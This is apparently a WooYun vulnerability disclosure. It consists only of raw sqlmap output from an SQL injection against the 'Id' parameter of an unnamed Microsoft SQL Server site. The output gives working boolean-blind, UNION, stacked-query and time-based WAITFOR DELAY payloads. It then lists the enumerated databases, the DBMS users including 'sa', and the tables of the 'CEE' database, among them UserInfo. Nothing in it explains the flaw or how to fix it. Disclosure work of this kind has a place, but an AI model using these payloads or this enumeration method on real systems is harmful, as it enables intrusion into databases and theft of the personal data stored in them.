WooYun.org

Place: GET
Parameter: Id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Id=P1' AND 6826=6826 AND 'yePp'='yePp
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: Id=-6024' UNION ALL SELECT NULL, CHAR(58)+CHAR(112)+CHAR(97)+CHAR(1
12)+CHAR(58)+CHAR(118)+CHAR(84)+CHAR(121)+CHAR(66)+CHAR(101)+CHAR(69)+CHAR(116)+
CHAR(102)+CHAR(82)+CHAR(99)+CHAR(58)+CHAR(97)+CHAR(115)+CHAR(105)+CHAR(58), NULL
, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: Id=P1'; WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: Id=P1' WAITFOR DELAY '0:0:5'--
available databases [26]:
[*] BGM
[*] CEE
[*] CEES
[*] COE
[*] COE-FILE
[*] COE-NEWS
[*] COE-USER
[*] COE-WORD
[*] COE_EN
[*] COE_OTHER
[*] COEFR
[*] COEJX
[*] COEOA
[*] COSEE-CHINA
[*] master
[*] MBIGC
[*] MEL_YQYY
[*] model
[*] msdb
[*] NFHYZX
[*] OSPET
[*] ReportServer
[*] ReportServerTempDB
[*] shibanyu
[*] tempdb
[*] XTZX
database management system users [2]:
[*] sa
[*] User_CEE
Database: CEE
[22 tables]
+--------------------+
| dbo.Comment |
| dbo.DictionaryInfo |
| dbo.DownloadInfo |
| dbo.FileInfo |
| dbo.FloatImg |
| dbo.NewsInfo |
| dbo.Report |
| dbo.SiteMap1 |
| dbo.SiteMap2 |
| dbo.SiteMap3 |
| dbo.T_NRInfo |
| dbo.T_NRType |
| dbo.T_TeacherInfo |
| dbo.T_ZCType |
| dbo.UserInfo |
| dbo.dtproperties |
| dbo.vDownloadInfo |
| dbo.vNewsInfo |
| dbo.vReport |
| dbo.vT_NRInfo |
| dbo.vT_TeacherInfo |
| dbo.vTeacherInfo |
+--------------------+